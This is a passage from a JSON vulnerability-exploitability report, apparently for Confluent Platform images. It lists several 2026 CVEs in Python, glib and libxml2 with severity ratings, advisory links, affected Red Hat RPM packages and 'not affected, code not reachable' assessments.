          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0672",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0672"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:10950"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0672"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2026-19177.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:10950"
        },
        {
          "url": "https://github.com/python/cpython/commit/62700107418eb2cca3fc88da036a243ea975f172"
        },
        {
          "url": "https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440"
        },
        {
          "url": "https://github.com/python/cpython/commit/7852d72b653fea0199acf5fc2a84f6f8b84eba8d"
        },
        {
          "url": "https://github.com/python/cpython/commit/918387e4912d12ffc166c8f2a38df92b6ec756ca"
        },
        {
          "url": "https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1869ff648bbee0717221d09e6deff46617f3e85"
        },
        {
          "url": "https://github.com/python/cpython/issues/143919"
        },
        {
          "url": "https://github.com/python/cpython/pull/143920"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0672.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0672"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
        }
      ],
      "published": "2026-01-20T22:15:52+00:00",
      "updated": "2026-06-17T10:11:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0988",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        190
      ],
      "description": "A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0988"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7461"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0988"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429886"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3851"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0988"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7971-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0988"
        }
      ],
      "published": "2026-01-21T12:15:55+00:00",
      "updated": "2026-06-17T10:11:43+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0989",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
      "description": "A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0989"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:7519"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0989"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2429933"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/998"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/merge_requests/374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0989"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7974-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0989"
        }
      ],
      "published": "2026-01-15T15:15:52+00:00",
      "updated": "2026-06-30T20:20:47+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.9.13-14.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-0990",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        674
      ],
